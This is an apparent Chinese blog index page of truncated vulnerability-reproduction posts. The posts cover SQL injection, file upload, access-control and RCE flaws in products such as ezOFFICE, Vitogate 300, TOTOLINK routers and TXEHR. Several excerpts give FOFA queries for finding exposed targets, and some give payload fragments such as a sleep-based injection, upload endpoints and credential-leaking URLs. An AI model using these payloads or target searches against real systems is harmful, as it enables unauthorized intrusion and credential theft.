Pages

W1-10万户-ezOffice-SQL

W1-10万户-ezOffice-SQL 漏洞描述: 万户 ezOFFICE DocumentEdit_deal.jsp 存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。 网站图片: 网络测绘: fofa语法: FOFA:app=“万户ezOFFICE协同管理

Babing Babing Published on 2024-08-30

W1-8万户-ezOffice-SQL

W1-8万户-ezOffice-SQL 漏洞描述: 万户 ezOFFICE wpsservlet接口存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。 网站图片: 网络测绘: fofa语法: FOFA:app=“万户ezOFFICE协同管理平台” 漏洞复现: p

Babing Babing Published on 2024-08-30

W1-9万户-ezOffice-SQL

W1-9万户-ezOffice-SQL 漏洞描述: 万户 ezOFFICE wf_accessory_delete.jsp 存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。 网站图片: 网络测绘: fofa语法: FOFA:app=“万户ezOFFICE协同管

Babing Babing Published on 2024-08-30

W1-7万户-ezOffice-SQL

W1-7万户-ezOffice-SQL 漏洞描述: 万户 ezOFFICE /defaultroot/platform/portal/portlet/pic/pic.jsp接口处存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。 网站图片: 网络测绘: fofa

Babing Babing Published on 2024-08-30

W1-6万户-ezOffice-SQL

W1-6万户-ezOffice-SQL 漏洞描述: 万户 ezOFFICE SendFileCheckTemplateEdit.jsp接口存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。 网站图片: 网络测绘: fofa语法: FOFA:app=“万户ezOF

Babing Babing Published on 2024-08-30

W1-5万户-ezOffice-SQL

W1-5万户-ezOffice-SQL 漏洞描述: 万户 ezOFFICE DocumentEdit.jsp 存在SQL注入漏洞。由于'DocumentID'参数缺乏过滤,允许攻击者利用漏洞获取数据库敏感信息。 网站图片: 网络测绘: fofa语法: FOFA:app=“ezOFFICE协同管理平台

Babing Babing Published on 2024-08-30

W1-3万户-ezOffice-SQL

W1-3万户-ezOffice-SQL 漏洞描述: 万户ezOFFICE协同管理平台是一个综合信息基础应用平台。 万户ezoffice协同管理平台check_onlyfield.jsp存在SQL注入漏洞,攻击者通过发送特殊的请求包可以对数据库进行SQL注入,获取服务器敏感信息。 网站图片: 网络测绘

Babing Babing Published on 2024-08-30

W1-2万户-ezOffice-SQL

W1-2万户-ezOffice-SQL 漏洞描述: 万户ezOFFICE协同管理平台是一个综合信息基础应用平台。 万户ezoffice协同管理平台check_onlyfield.jsp存在SQL注入漏洞,攻击者通过发送特殊的请求包可以对数据库进行SQL注入,获取服务器敏感信息。 网站图片: 网络测绘

Babing Babing Published on 2024-08-30

W1-4万户-ezOffice-PermissionAC

W1-4万户-ezOffice-PermissionAC 漏洞描述: 万户ezOFFICE协同管理平台是一个综合信息基础应用平台。 万户ezoffice协同管理平台存在未授权访问漏洞,攻击者可以从evoInterfaceServlet接口获得系统登录账号和用MD5加密的密码 网站图片: 网络测绘:

Babing Babing Published on 2024-08-30

W1-1万户-ezOffice-SQL

W1-1万户-ezOffice-SQL 漏洞描述: 万户 ezOFFICE contract_gd.jsp 存在SQL注入漏洞,未授权的攻击者可利用此漏洞获取数据库权限,深入利用可获取服务器权限。 影响版本: 至2024年3月30日 网站图片: 网络测绘: fofa语法: app=“万户ezOFFI

Babing Babing Published on 2024-08-30

V1-1Viessmann-Vitogate300-RCE

V1-1Viessmann-Vitogate300-RCE 漏洞描述: Vitogate 300 组件/cgi-bin/vitogate.cgi中的一个问题允许未经身份验证的攻击者绕过身份验证,通过特制的请求执行任意命令,可导致服务器失陷。 影响版本: version <=** **2.1.3.0

Babing Babing Published on 2024-08-30

U1-1usdtAdmin-收款管理系统-SQL

U1-1usdtAdmin-收款管理系统-SQL 漏洞复现: payload: GET /index/index/send?query=select%20sleep(5) HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS

Babing Babing Published on 2024-08-30

T24-1TVT-DVR-InformationLeakage

T24-1TVT-DVR-InformationLeakage fofa语法: fofa:“v\=20180615.01" src\="js/lib/require.js" type\="text/javascript” 漏洞复现: payload: POST /queryDevInfo HTTP/

Babing Babing Published on 2024-08-30

T23-1TOTOLINK--InformationLeakage

T23-1TOTOLINK–InformationLeakage fofa语法: fofa:“TOTOLINK” 漏洞复现: 访问会下载一个xxxx.bat文件里面泄漏账号密码,可登录后台 payload: http://ip/cgi-bin/ExportSettings.sh

Babing Babing Published on 2024-08-30

T22-1TOTOLINK-A3700R-PermissionAC

T22-1TOTOLINK-A3700R-PermissionAC fofa语法: fofa:“TOTOLINK” 漏洞复现: payload: http://ip/wizard.html http://ip/phone/wizard.html

Babing Babing Published on 2024-08-30

T21-1拓尔思-TRS媒资管理系统-任意文件上传

T21-1拓尔思-TRS媒资管理系统-任意文件上传 漏洞复现: payload: POST /mas/servlets/uploadThumb?appKey=sv&uploadingId=asd HTTP/1.1 Accept: */* Content-Type: multipart/form-da

Babing Babing Published on 2024-08-30

T20-3同享TXEHR-人力管理管理平台-SQL

T20-3同享TXEHR-人力管理管理平台-SQL 漏洞复现: payload: POST /Service/SFZService.asmx HOST: SOAPAction: http://tempuri.org/GetEmployeeBySFZ Content-Type: text/xml;c

Babing Babing Published on 2024-08-30

T20-2同享TXEHR-人力管理管理平台-任意文件上传

T20-2同享TXEHR-人力管理管理平台-任意文件上传 漏洞复现: payload: POST /MobileService/Web/Handler/hdlUploadFile.ashx?puser=.//Style/abcd HTTP/1.1 Host: {{Hostname}}

Babing Babing Published on 2024-08-30

T20-1同享TXEHR-人力管理管理平台-PermissionAC

T20-1同享TXEHR-人力管理管理平台-PermissionAC 漏洞复现: payload: POST /Service/DownloadTemplate.asmx HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.1

Babing Babing Published on 2024-08-30

T19-1拓尔思-TRSWAS5.0-PermissionAC

T19-1拓尔思-TRSWAS5.0-PermissionAC 漏洞复现: payload: /mas/servlets/uploadThumb?appKey=sv&uploading=1

Babing Babing Published on 2024-08-30
Previous Next